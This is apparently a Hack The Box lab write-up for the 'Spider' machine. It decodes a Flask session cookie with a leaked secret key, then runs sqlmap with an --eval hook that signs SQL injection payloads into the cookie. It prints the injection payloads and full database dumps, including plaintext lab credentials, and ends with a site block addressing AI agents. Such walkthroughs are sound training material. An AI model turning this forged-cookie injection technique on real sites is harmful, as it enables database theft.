# 3 :80 sqlmap via flask cookie Using ``` $ flask-unsign -d -c 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo' -S 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942' $ flask-unsign --decode --cookie 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo' {'cart_items': []} # last link on page talks about using sqlmap using flask session cookie Using https://book.hacktricks.xyz/pentesting/pentesting-web/flask#sqli-in-flask-session-cookie-with-sqlmap | > https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap#eval ``` Using ``` # ran as it was got errors, then explored and realized its uuid (not uid). $ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dbs [*] starting @ 17:28:59 /2021-10-06/ custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y [17:29:05] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly [17:29:05] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [17:29:05] [INFO] testing connection to the target URL [17:29:07] [INFO] testing if the target URL content is stable you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n [17:29:13] [INFO] target URL content is stable [17:29:13] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic do you want to URL encode cookie values (implementation specific)? [Y/n] Y [17:29:18] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic [17:29:19] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable [17:29:20] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*' [17:29:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [17:29:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [17:29:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' [17:29:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [17:29:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)' [17:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [17:29:57] [INFO] testing 'Generic inline queries' [17:29:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' [17:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' [17:30:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' [17:30:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [17:30:29] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [17:30:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [17:30:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [17:31:18] [INFO] target URL appears to be UNION injectable with 1 columns [17:31:21] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable (custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests: --- Parameter: Cookie #1* ((custom) HEADER) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: session=' AND (SELECT 6878 FROM (SELECT(SLEEP(5)))Dspl) AND 'xliC'='xliC Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: session=' UNION ALL SELECT CONCAT(0x717a786b71,0x756e616e446a5651496b4662456159494656584b736d77776f554b57787a477867794e4e73644845,0x717a6a6a71)-- - ' --- [17:31:29] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.14.0 back-end DBMS: MySQL >= 5.0.12 [17:31:36] [INFO] fetching database names available databases [5]: [*] information_schema [*] mysql [*] performance_schema [*] shop [*] sys [17:31:37] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 76 times [17:31:37] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb' [*] ending @ 17:31:37 /2021-10-06/ --- ``` ``` # -D shop --tables [17:32:49] [INFO] fetching tables for database: 'shop' do you want to URL encode cookie values (implementation specific)? [Y/n] Y you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n Database: shop [4 tables] +----------+ | items | | messages | | support | | users | +----------+ # -D shop --dump-all Database: shop Table: messages [1 entry] +---------+---------+-----------------------------------------------------------------------------------+---------------------+ | post_id | creator | message | timestamp | +---------+---------+-----------------------------------------------------------------------------------+---------------------+ | 1 | 1 | Fix the /a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal portal! | 2020-04-24 15:02:41 | +---------+---------+-----------------------------------------------------------------------------------+---------------------+ [17:34:56] [INFO] table 'shop.messages' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/messages.csv' [17:34:56] [INFO] fetching columns for table 'items' in database 'shop' [17:34:57] [INFO] fetching entries for table 'items' in database 'shop' Database: shop Table: items [6 entries] +----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+ | id | name | price | image_path | description | +----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+ | 1 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. | | 2 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. | | 3 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. | | 4 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. | | 5 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. | | 6 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. | +----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+ [17:34:58] [INFO] table 'shop.items' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/items.csv' [17:34:58] [INFO] fetching columns for table 'users' in database 'shop' [17:34:59] [INFO] fetching entries for table 'users' in database 'shop' Database: shop Table: users [9 entries] +----+--------------------------------------+------------+--------------------------------------+ | id | uuid | name | password | +----+--------------------------------------+------------+--------------------------------------+ | 1 | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | ch1VW4sHERE7331 | | 2 | 39643204-192c-4bb8-88d2-61dc81de7510 | kashz | kashz | | 3 | | hzx"zxc | ddb8ef28-a54a-4da1-b734-f5eff7af2c0f | #" | 4 | a7e52b68-53d2-4cf2-b072-6aff45d7d31c | ${7*7} | kashz | | 5 | bb731ee3-c354-46ea-93ad-ce05d99f1f29 | {{7*7}} | kashz | | 6 | 4459e9dc-f87d-45c8-a0e2-f4480f4a6398 | {{7*7}} | kashz | | 7 | d8a9109b-4ff2-46e1-bc85-4e77c2ca0c35 | {{10*10}} | kashz | | 8 | b3d3c283-26c8-4d4a-b7c0-cf1fc000f7bb | {{7*'7'}} | KASHZ | | 9 | 4480d8e5-eda9-4053-be22-e807f716a45a | {{config}} | kashz | +----+--------------------------------------+------------+--------------------------------------+ [17:35:00] [INFO] table 'shop.users' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/users.csv' [17:35:00] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 3 times [17:35:00] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb' [*] ending @ 17:35:00 /2021-10-06/ ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/hackthebox-writeups/htb-boxes/spider/3-80-sqlmap-via-flask-cookie.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.